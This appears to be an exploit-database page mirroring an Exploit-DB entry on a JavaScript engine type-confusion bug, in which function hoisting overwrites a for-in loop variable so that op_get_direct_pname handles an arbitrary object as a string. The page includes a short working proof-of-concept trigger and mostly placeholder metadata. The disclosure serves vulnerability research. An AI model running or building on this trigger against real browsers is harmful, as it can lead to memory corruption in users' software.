header-logo
Suggest Exploit
vendor:
N/A
by:
N/A
7.5
CVSS
HIGH
Improper Validation of Array Index
129
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

Issue 1263

When hoisting a function onto the outer scope, if it overwrites the iteration variable for a for-in loop it should invalidate the corresponding ForInContext object, but it doesn't. As a result, an arbitrary object can be passed as the property variable to the op_get_direct_pname handler which uses the property variable directly as a string object without any check.

Mitigation:

Ensure that the iteration variable for a for-in loop is not overwritten.
Source

Exploit-DB raw data:

/*
This is simillar to  issue 1263 . When hoisting a function onto the outer scope, if it overwrites the iteration variable for a for-in loop it should invalidate the corresponding ForInContext object, but it doesn't. As a result, an arbitrary object can be passed as the property variable to the op_get_direct_pname handler which uses the property variable directly as a string object without any check.

PoC:
*/

function trigger() {
    let o = {a: 1};
    for (var k in o) {
        {
            k = 0x1234;

            function k() {

            }
        }

        o[k];
    }
}

trigger();

Navigation

Suggest Exploit

Services By CQR